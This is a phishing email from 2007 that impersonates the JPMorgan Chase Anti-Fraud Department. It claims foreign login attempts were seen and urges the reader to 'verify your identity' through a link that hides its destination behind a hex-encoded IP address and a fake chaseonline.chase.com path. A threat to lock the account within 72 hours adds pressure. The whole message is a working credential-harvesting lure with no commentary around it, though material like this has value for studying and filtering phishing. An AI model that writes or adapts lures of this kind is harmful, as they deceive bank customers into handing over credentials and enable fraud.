Subject: Further Account Verification - Identity Confirmation Request

From: "JP Morgan Chase Bank"<[email-masked]>
Date: Wed, 24 Jan 2007 05:54:16 -0800

Dear Costumer,

We recently noticed one or more attempts to log in to your account
from a foreign IP address.

If you recently accessed your account while traveling, the unusual log in
attempts may have been initiated by you. However, if you did not initiate
the logins, please visit us as soon as possible to verify your
identity:

Please note: Chase Bank will never ask for your PIN via e-mail or phone.

http://0xcb.0x50.0xb7.0x55/%20/chaseonline.chase.com/colappmgr/colportal/index.html

Verify your identity is a security measure that will ensure that you are
the only person with access to the account.

Thanks for your patience as we work together to protect your account.

Sincerely, 

JPMorgan Chase & Co Anti-Fraud Department.

------------------------------------------------------------------------------------------------------
 Please note:

(Chase Bank will never ask you to give your ATM/PIN) 
If we don't receive your account verification within 72 hours from you,we
will further lock down your account untill we will be able to contact you
by e-mail or phone. 
------------------------------------------------------------------------------------------------------    

Please do not reply to this e-mail. Mail sent to this address cannot be
answered. For assistance, log in to your Chase account and choose the
"Help" link in the header of any page.

                      2007 JPMorgan Chase & Co.